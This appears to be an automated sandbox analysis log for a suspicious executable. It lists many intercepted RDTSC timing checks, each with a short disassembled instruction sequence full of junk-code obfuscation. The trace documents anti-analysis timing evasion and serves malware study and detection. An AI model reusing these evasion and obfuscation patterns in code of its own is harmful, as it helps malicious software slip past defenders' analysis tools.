Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A39AFC second address: A39B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297131h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA441297132h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A39B23 second address: A39B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4622B second address: A46230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976381 second address: 976385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976385 second address: 976391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50527 second address: A50536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA4407343DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50536 second address: A5053A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5053A second address: A50540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50540 second address: A50561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297138h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5082F second address: A50844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A50844 second address: A5084C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A54F83 second address: A54F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A62B26 second address: A62B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A64D1A second address: A64D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A64D20 second address: A64D26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A64D26 second address: A64D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA4407343E1h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007FA4407343DBh 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A74AE5 second address: A74B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297139h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FA441297126h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A74B0E second address: A74B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FA4407343D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A74B1A second address: A74B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A569 second address: A8A571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A571 second address: A8A57B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA441297126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A84E second address: A8A86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FA4407343E8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8AB1F second address: A8AB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B111 second address: A8B12D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA4407343D6h 0x00000009 jmp 00007FA4407343DBh 0x0000000e jns 00007FA4407343D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B12D second address: A8B14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jl 00007FA441297146h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA44129712Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B14C second address: A8B150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B150 second address: A8B154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B3DC second address: A8B3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA4407343E5h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8B3F5 second address: A8B408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA44129712Dh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E2EA second address: A8E2FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E2FB second address: A8E358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FA441297126h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FA441297128h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov edx, dword ptr [ebp+122D32BEh] 0x00000031 mov dl, bh 0x00000033 push 00000004h 0x00000035 push DF92422Eh 0x0000003a push eax 0x0000003b push edx 0x0000003c jbe 00007FA44129713Fh 0x00000042 jmp 00007FA441297139h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E563 second address: A8E567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E567 second address: A8E5CD instructions: 0x00000000 rdtsc 0x00000002 js 00007FA441297126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FA441297128h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D18C7h], edx 0x00000032 push dword ptr [ebp+1244F20Fh] 0x00000038 jmp 00007FA441297136h 0x0000003d call 00007FA441297129h 0x00000042 push edi 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E5CD second address: A8E5DF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4407343D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E5DF second address: A8E5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E5E3 second address: A8E5E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E5E9 second address: A8E5EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E5EF second address: A8E603 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA4407343D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E603 second address: A8E64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007FA441297131h 0x0000000b pop edx 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push ebx 0x00000010 pushad 0x00000011 jmp 00007FA44129712Dh 0x00000016 jng 00007FA441297126h 0x0000001c popad 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push esi 0x00000023 pushad 0x00000024 jmp 00007FA44129712Eh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F85D second address: A8F861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F861 second address: A8F879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297130h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F879 second address: A8F87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F87D second address: A8F894 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA44129712Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F894 second address: A8F8B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A915B8 second address: A915C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A915C3 second address: A915D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F029B second address: 50F02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F02A1 second address: 50F02D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA4407343DEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F02D7 second address: 50F02DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F02DB second address: 50F02DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F02DF second address: 50F02E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F02E5 second address: 50F02EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE0AD second address: 9AE0B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0441 second address: 50F047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA4407343E3h 0x0000000a sbb esi, 4B9BF3CEh 0x00000010 jmp 00007FA4407343E9h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F047A second address: 50F04C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA441297137h 0x00000009 or esi, 659281DEh 0x0000000f jmp 00007FA441297139h 0x00000014 popfd 0x00000015 mov si, 8CA7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov edx, dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F04C5 second address: 50F04C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F04C9 second address: 50F04D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA44129712Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F04D8 second address: 50F04DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F04DD second address: 50F0509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 0908h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov bx, F120h 0x00000012 mov ecx, edi 0x00000014 popad 0x00000015 mov al, byte ptr [edx] 0x00000017 jmp 00007FA44129712Bh 0x0000001c inc edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov dh, F4h 0x00000022 movzx ecx, di 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0509 second address: 50F050F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F050F second address: 50F0513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0513 second address: 50F0539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA4407343DAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0539 second address: 50F053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F053D second address: 50F0543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0543 second address: 50F0549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0549 second address: 50F054D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F054D second address: 50F0509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA441297138h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FA4412970A7h 0x00000011 mov al, byte ptr [edx] 0x00000013 jmp 00007FA44129712Bh 0x00000018 inc edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov dh, F4h 0x0000001e movzx ecx, di 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0591 second address: 50F05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4407343DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F05A3 second address: 50F05DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA441297138h 0x00000014 and cx, 2748h 0x00000019 jmp 00007FA44129712Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F05DD second address: 50F05E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F05E2 second address: 50F0693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F278h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c dec edi 0x0000000d jmp 00007FA44129712Dh 0x00000012 lea ebx, dword ptr [edi+01h] 0x00000015 jmp 00007FA44129712Eh 0x0000001a mov al, byte ptr [edi+01h] 0x0000001d pushad 0x0000001e push esi 0x0000001f mov dl, 9Eh 0x00000021 pop esi 0x00000022 pushfd 0x00000023 jmp 00007FA44129712Fh 0x00000028 sbb ax, A79Eh 0x0000002d jmp 00007FA441297139h 0x00000032 popfd 0x00000033 popad 0x00000034 inc edi 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FA44129712Ch 0x0000003c jmp 00007FA441297135h 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007FA441297130h 0x00000048 sub cl, FFFFFFF8h 0x0000004b jmp 00007FA44129712Bh 0x00000050 popfd 0x00000051 popad 0x00000052 test al, al 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0693 second address: 50F0697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0697 second address: 50F069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F069B second address: 50F06A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F06A1 second address: 50F06BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA44129712Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FA4B23CF4F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F06BB second address: 50F06BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F06BF second address: 50F06C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F06C5 second address: 50F06CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F06CB second address: 50F075A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA44129712Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, edx 0x0000000d jmp 00007FA441297130h 0x00000012 shr ecx, 02h 0x00000015 jmp 00007FA441297130h 0x0000001a rep movsd 0x0000001c rep movsd 0x0000001e rep movsd 0x00000020 rep movsd 0x00000022 rep movsd 0x00000024 jmp 00007FA441297130h 0x00000029 mov ecx, edx 0x0000002b jmp 00007FA441297130h 0x00000030 and ecx, 03h 0x00000033 jmp 00007FA441297130h 0x00000038 rep movsb 0x0000003a pushad 0x0000003b push esi 0x0000003c mov ax, bx 0x0000003f pop edx 0x00000040 mov edx, ecx 0x00000042 popad 0x00000043 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d mov ebx, 7AB891F0h 0x00000052 mov di, DD1Ch 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F075A second address: 50F07BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA4407343DEh 0x00000012 and eax, 2BD85168h 0x00000018 jmp 00007FA4407343DBh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FA4407343E6h 0x00000026 or ecx, 7B38A3C8h 0x0000002c jmp 00007FA4407343DBh 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F07BF second address: 50F07F7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA441297138h 0x00000008 and ax, A628h 0x0000000d jmp 00007FA44129712Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ecx, dword ptr [ebp-10h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov al, bl 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F07F7 second address: 50F0849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 jmp 00007FA4407343DEh 0x00000015 pop ecx 0x00000016 pushad 0x00000017 call 00007FA4407343DEh 0x0000001c mov ecx, 7ACAA071h 0x00000021 pop eax 0x00000022 mov al, bl 0x00000024 popad 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F0849 second address: 50F084D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F084D second address: 50F0868 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4407343E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F09AF second address: 50F09E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA441297133h 0x0000000a add eax, 58CDE89Eh 0x00000010 jmp 00007FA441297139h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50F09E8 second address: 50F0A58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA4407343E7h 0x00000016 xor esi, 3A6C635Eh 0x0000001c jmp 00007FA4407343E9h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FA4407343E0h 0x00000028 jmp 00007FA4407343E5h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
